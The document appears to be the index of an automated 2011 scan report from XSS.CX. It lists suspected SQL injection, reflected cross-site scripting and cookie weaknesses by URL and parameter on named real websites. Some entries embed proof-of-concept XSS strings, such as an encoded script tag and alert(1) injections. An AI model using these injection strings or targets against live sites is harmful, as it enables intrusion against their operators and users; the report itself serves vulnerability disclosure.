CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Fri Apr 01 13:25:59 CDT 2011.

1. SQL injection

1.1. http://politicalwire.com/favicon.ico [REST URL parameter 1]

1.2. http://www.cambridge.org/favicon.ico [REST URL parameter 1]

1.3. http://www.dogpile.com/dogpile_other/ws/index [Referer HTTP header]

1.4. http://www.dogpile.com/dogpile_other/ws/index [wsViewRecent cookie]

2. Cross-site scripting (reflected)

2.1. http://a.collective-media.net/adj/ns.androidtapp/general [REST URL parameter 2]

2.2. http://a.collective-media.net/adj/ns.androidtapp/general [REST URL parameter 3]

2.3. http://a.collective-media.net/adj/ns.androidtapp/general [name of an arbitrarily supplied request parameter]

2.4. http://a.collective-media.net/adj/ns.androidtapp/general [ppos parameter]

2.5. http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 1]

2.6. http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 2]

2.7. http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 3]

2.8. http://a.collective-media.net/cmadj/ns.androidtapp/general [ppos parameter]

2.9. http://ads.adxpose.com/ads/ads.js [uid parameter]

2.10. http://api.ipinfodb.com/v2/ip_query_country.php [callback parameter]

2.11. http://api.ipinfodb.com/v2/ip_query_country.php [name of an arbitrarily supplied request parameter]

2.12. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.13. http://b.scorecardresearch.com/beacon.js [c15 parameter]

2.14. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.15. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.16. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.17. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.18. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.19. http://event.adxpose.com/event.flow [uid parameter]

2.20. http://ib.adnxs.com/ab [cnd parameter]

2.21. http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 1]

2.22. http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 2]

2.23. http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 3]

2.24. http://manhattan.ny1.com/Content/ServeContent.aspx [REST URL parameter 1]

2.25. http://manhattan.ny1.com/Content/ServeContent.aspx [REST URL parameter 2]

2.26. http://manhattan.ny1.com/Content/ServeResource.aspx [REST URL parameter 1]

2.27. http://manhattan.ny1.com/Content/ServeResource.aspx [REST URL parameter 2]

2.28. http://manhattan.ny1.com/content/top_stories/ [REST URL parameter 1]

2.29. http://manhattan.ny1.com/content/top_stories/ [REST URL parameter 2]

2.30. http://manhattan.ny1.com/content/top_stories/ [name of an arbitrarily supplied request parameter]

2.31. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

2.32. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

2.33. http://suggest.infospace.com/QuerySuggest/SuggestServlet [reqID parameter]

2.34. http://view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

2.35. http://view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

2.36. http://view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

2.37. http://view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

2.38. http://view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

2.39. http://view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

2.40. http://view.c3metrics.com/v.js [cid parameter]

2.41. http://view.c3metrics.com/v.js [id parameter]

2.42. http://view.c3metrics.com/v.js [t parameter]

2.43. http://www.aeriagames.com/favicon.ico [REST URL parameter 1]

2.44. http://www.aeriagames.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.45. http://www.aeriagames.com/meebo.html [REST URL parameter 1]

2.46. http://www.aeriagames.com/themes/main/favicon.ico [REST URL parameter 3]

2.47. http://www.aeriagames.com/themes/main/favicon.ico [name of an arbitrarily supplied request parameter]

2.48. http://www.androidtapp.com/favicon.ico [REST URL parameter 1]

2.49. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 [REST URL parameter 1]

2.50. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 [REST URL parameter 2]

2.51. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 [name of an arbitrarily supplied request parameter]

2.52. http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 1]

2.53. http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 2]

2.54. http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 3]

2.55. http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 1]

2.56. http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 2]

2.57. http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 3]

2.58. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 1]

2.59. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 2]

2.60. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 3]

2.61. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 4]

2.62. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 1]

2.63. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 2]

2.64. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 3]

2.65. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 4]

2.66. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 1]

2.67. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 2]

2.68. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 3]

2.69. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 4]

2.70. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 1]

2.71. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 2]

2.72. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 3]

2.73. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 4]

2.74. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]

2.75. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]

2.76. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]

2.77. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]

2.78. http://www.androidtapp.com/wp-login.php [REST URL parameter 1]

2.79. http://www.autobytel.com/favicon.ico [REST URL parameter 1]

2.80. http://www.beatthetraffic.com/widgets/traveltimes.aspx [partner parameter]

2.81. http://www.cambridge.org/favicon.ico [REST URL parameter 1]

2.82. http://www.cambridge.org/uk/404_error.asp [REST URL parameter 2]

2.83. http://www.cambridge.org/uk/404_error.asp [error parameter]

2.84. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 2]

2.85. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 3]

2.86. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 4]

2.87. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [name of an arbitrarily supplied request parameter]

2.88. http://www.cambridge.org/uk/catalogue/viewBasket.asp [REST URL parameter 2]

2.89. http://www.cambridge.org/uk/catalogue/viewBasket.asp [REST URL parameter 3]

2.90. http://www.dmvnow.com/favicon.ico [REST URL parameter 1]

2.91. http://www.dogpile.com/dogpile/ws/redir/_iceUrlFlag=11 [qcat parameter]

2.92. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [icePage%24SearchBoxTop%24qcat parameter]

2.93. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [icePage%24SearchBoxTop%24qcat parameter]

2.94. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [qcat parameter]

2.95. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter]

2.96. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter]

2.97. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter]

2.98. http://www.kicksonfire.com/favicon.ico [REST URL parameter 1]

2.99. http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 1]

2.100. http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 2]

2.101. http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 3]

2.102. http://www.ny1.com/Content/ServeContent.aspx [REST URL parameter 1]

2.103. http://www.ny1.com/Content/ServeContent.aspx [REST URL parameter 2]

2.104. http://www.ny1.com/Content/ServeResource.aspx [REST URL parameter 1]

2.105. http://www.ny1.com/Content/ServeResource.aspx [REST URL parameter 2]

2.106. http://www.ny1.com/favicon.ico [80003'-alert(1)-'46fe3f653ad parameter]

2.107. http://www.ny1.com/favicon.ico [REST URL parameter 1]

2.108. http://www.ny1.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.109. http://www.ottawacitizen.com/favicon.ico [REST URL parameter 1]

2.110. http://www.quickyellow.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.111. http://www.swiftpage1.com/favicon.ico [REST URL parameter 1]

2.112. http://www.swiftpage1.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.113. http://www.viagra.com/favicon.ico [REST URL parameter 1]

2.114. http://www.viagra.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.115. http://community.dogpile.com/ [User-Agent HTTP header]

2.116. http://support.dogpile.com/pressroom/ [User-Agent HTTP header]

2.117. http://www.blacksingles.com/favicon.ico [Referer HTTP header]

2.118. http://www.palomar.edu/favicon.ico [Referer HTTP header]

2.119. http://www.palomar.edu/favicon.ico [User-Agent HTTP header]

2.120. http://a.collective-media.net/cmadj/ns.androidtapp/general [cli cookie]

2.121. http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 [DomainSession cookie]

2.122. http://view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

2.123. http://www.8tracks.com/favicon.ico [REST URL parameter 1]

2.124. http://www.8tracks.com/favicon.ico [REST URL parameter 1]

2.125. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11 [DomainSession cookie]

2.126. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11 [DomainSession cookie]

2.127. http://www.dogpile.com/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11 [DomainSession cookie]

2.128. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11 [DomainSession cookie]

2.129. http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/ [DomainSession cookie]

2.130. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11 [DomainSession cookie]

2.131. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11 [DomainSession cookie]

2.132. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11 [DomainSession cookie]

2.133. http://www.dogpile.com/dogpile_other/ws/index [DomainSession cookie]

2.134. http://www.dogpile.com/dogpile_other/ws/index [DomainSession cookie]

2.135. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11 [DomainSession cookie]

2.136. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11 [DomainSession cookie]

2.137. http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 [DomainSession cookie]

2.138. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [DomainSession cookie]

2.139. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11 [DomainSession cookie]

2.140. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11 [DomainSession cookie]

2.141. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11 [DomainSession cookie]

2.142. http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7 [DomainSession cookie]

2.143. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes [DomainSession cookie]

2.144. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant [DomainSession cookie]

2.145. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11 [DomainSession cookie]

2.146. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11 [DomainSession cookie]

2.147. http://www.dogpile.com/dogpile_rss/ws/index/ [DomainSession cookie]

2.148. http://www.dogpile.com/favicon.ico [DomainSession cookie]

2.149. http://www.dogpile.com/info.dogpl.rss/Web6c5ea//' [DomainSession cookie]

2.150. http://www.dogpile.com/info.dogpl.rss/web/GE+Zero+Taxes [DomainSession cookie]

2.151. http://www.dogpile.com/info.dogpl.rss/web/Go+Daddy+CEO+Elephant [DomainSession cookie]

2.152. http://www.dogpile.com/info.dogpl.rss/web/MLB+Schedule [DomainSession cookie]

2.153. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.154. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.155. http://www.mercantila.com/website/shoppingcart/cartbroker.php [merc_uid cookie]

2.156. http://www.mrnumber.com/favicon.ico [REST URL parameter 1]

2.157. http://www.mrnumber.com/favicon.ico [REST URL parameter 1]

2.158. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.159. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.160. http://www.opinionoutpost.com/favicon.ico [REST URL parameter 1]

2.161. http://www.opinionoutpost.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.162. http://www.rateyourmusic.com/favicon.ico [REST URL parameter 1]

2.163. http://www.rateyourmusic.com/favicon.ico [name of an arbitrarily supplied request parameter]

3. Cleartext submission of password

3.1. http://ecards.myfuncards.com/myfuncards/404

3.2. http://www.androidtapp.com/wp-login.php

4. Session token in URL

5. ASP.NET ViewState without MAC enabled

5.1. http://www.maybenow.com/favicon.ico

5.2. http://www.nabiscoworld.com/favicon.ico

6. Cookie scoped to parent domain

6.1. http://www.888.com/favicon.ico

6.2. http://www.dogpile.com/

6.3. http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1

6.4. http://www.dogpile.com/clickserver/_iceUrlFlag=1

6.5. http://www.dogpile.com/dogpile/ws/about/

6.6. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11

6.7. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11

6.8. http://www.dogpile.com/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11

6.9. http://www.dogpile.com/dogpile/ws/faq/

6.10. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

6.11. http://www.dogpile.com/dogpile/ws/redir/_iceUrlFlag=11

6.12. http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/

6.13. http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11

6.14. http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11

6.15. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11

6.16. http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11

6.17. http://www.dogpile.com/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11

6.18. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11

6.19. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11

6.20. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11

6.21. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11

6.22. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11

6.23. http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11

6.24. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11

6.25. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11

6.26. http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11

6.27. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11

6.28. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11

6.29. http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

6.30. http://www.dogpile.com/dogpile_other/ws/index

6.31. http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11

6.32. http://www.dogpile.com/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11

6.33. http://www.dogpile.com/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11

6.34. http://www.dogpile.com/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11

6.35. http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11

6.36. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11

6.37. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11

6.38. http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11

6.39. http://www.dogpile.com/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11

6.40. http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11

6.41. http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

6.42. http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11

6.43. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11

6.44. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

6.45. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

6.46. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

6.47. http://www.dogpile.com/dogpile_other/ws/redir/qkw=horoscope/rfcid=4400/rfcp=quickstart-6/qlnk=1/_iceUrlFlag=11

6.48. http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7

6.49. http://www.dogpile.com/dogpile_other/ws/termsofuse/_iceUrlFlag=11

6.50. http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11

6.51. http://www.dogpile.com/dogpile_prefer/ws/redir/_iceUrlFlag=11

6.52. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes

6.53. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant

6.54. http://www.dogpile.com/dogpile_rss/web/MLB+Schedule

6.55. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11

6.56. http://www.dogpile.com/dogpile_rss/ws/aboutresults/_iceUrlFlag=11

6.57. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11

6.58. http://www.dogpile.com/dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11

6.59. http://www.dogpile.com/dogpile_rss/ws/index/

6.60. http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11

6.61. http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11

6.62. http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11

6.63. http://www.dogpile.com/dogpile_rss/ws/preferences/_iceUrlFlag=11

6.64. http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

6.65. http://www.dogpile.com/dogpile_rss/ws/privacy/_iceUrlFlag=11

6.66. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11

6.67. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Bowl/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11

6.68. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Com/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11

6.69. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email%20Login/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

6.70. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11

6.71. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Log%20In/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

6.72. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Video/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11

6.73. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Videos%20Full/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

6.74. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11

6.75. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=MLB%20Schedule/adv=/rfcp=RightNav/rfcid=107/_iceUrlFlag=11

6.76. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%202010%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11

6.77. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Baseball%20Schedules/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

6.78. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%201!2F1!2F09%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

6.79. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11

6.80. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11

6.81. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Scores/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11

6.82. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Standings/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11

6.83. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Trade%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

6.84. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=web/qkw=Go%20Daddy%20CEO%20Elephant/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11

6.85. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=web/qkw=MLB%20Schedule/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11

6.86. http://www.dogpile.com/dogpile_rss/ws/termsofuse/_iceUrlFlag=11

6.87. http://a.collective-media.net/adj/ns.androidtapp/general

6.88. http://ad.amgdgt.com/ads/

6.89. http://b.scorecardresearch.com/b

6.90. http://b.scorecardresearch.com/p

6.91. http://bh.contextweb.com/bh/set.aspx

6.92. http://cf.addthis.com/red/p.json

6.93. http://ib.adnxs.com/ab

6.94. http://leadback.advertising.com/adcedge/lb

6.95. http://m.adnxs.com/msftcookiehandler

6.96. http://pixel.33across.com/ps/

6.97. http://pixel.fetchback.com/serve/fb/pdc

6.98. http://pixel.quantserve.com/pixel

6.99. http://r1-ads.ace.advertising.com/site=775632/size=300250/u=2/bnum=15423922/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

6.100. http://r1-ads.ace.advertising.com/site=775632/size=300250/u=2/bnum=75921501/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

6.101. http://r1-ads.ace.advertising.com/site=775633/size=728090/u=2/bnum=34648487/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

6.102. http://r1-ads.ace.advertising.com/site=775633/size=728090/u=2/bnum=81095569/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

6.103. http://r1-ads.ace.advertising.com/site=775634/size=160600/u=2/bnum=50393661/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

6.104. http://r1-ads.ace.advertising.com/site=775634/size=160600/u=2/bnum=54361916/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

6.105. http://r1-ads.ace.advertising.com/site=782463/size=160600/u=2/bnum=47025873/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

6.106. http://r1-ads.ace.advertising.com/site=782463/size=160600/u=2/bnum=70936362/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

6.107. http://r1-ads.ace.advertising.com/site=782464/size=300250/u=2/bnum=21125090/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

6.108. http://r1-ads.ace.advertising.com/site=782464/size=300250/u=2/bnum=83041319/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

6.109. http://safebrowsing.clients.google.com/safebrowsing/downloads

6.110. http://syndication.mmismm.com/tntwo.php

6.111. http://tags.bluekai.com/site/2045

6.112. http://tags.bluekai.com/site/2731

6.113. http://view.c3metrics.com/c3VTabstrct-6-2.php

6.114. http://www.amway.com/favicon.ico

6.115. http://www.bbpeoplemeet.com/favicon.ico

6.116. http://www.belkin.com/favicon.ico

6.117. http://www.jpcycles.com/favicon.ico

6.118. http://www.loveandseek.com/favicon.ico

6.119. http://www.mercantila-checkout.com/setcookie.js

6.120. http://www.progressiveagent.com/favicon.ico

6.121. http://www.rambler.ru/favicon.ico

6.122. http://www.wpbf.com/favicon.ico

7. Cookie without HttpOnly flag set

7.1. http://ads.adxpose.com/ads/ads.js

7.2. http://community.dogpile.com/

7.3. http://dogpile.com/

7.4. http://dogpile.com/dogpile/ws/index/qcat=yp/_iceUrlFlag=11

